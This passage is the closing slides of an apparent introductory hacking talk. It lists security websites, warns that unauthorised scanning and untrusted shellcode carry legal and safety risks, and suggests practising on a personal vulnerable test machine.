  • 27. Resources  If this type of information interests you, there are many safe online resources.  www.hackthissite.org - a friendly playground for web hackers  www.phrack.org - a very good place for random articles with great pieces of info  www.securityfocus.com - some of the best up-to- date info about vulnerabilities and exploits.
  • 28. Conclusion  Again, I emphasize just because I’m showing you this, does NOT make it legal.  In fact, scanning government systems with NMAP and getting caught can land you with fines & possible jail time. Running exploits with shellcode you do not trust could be potentially exposing your test system to a wild virus or backdoor you do not know about.  Remember, finding exploits that work is tedious, not everything you find online works every time. Setup a fun box (something like Mandrake) and install some vulnerable software on there. See if you can break into it. Ex. Wuftpd 2.60. Have fun, it takes work so don’t give up!
  • 29. Thank You For Your Time! Feel free to email me any questions/comments at Er.dehaljatt@gmail.com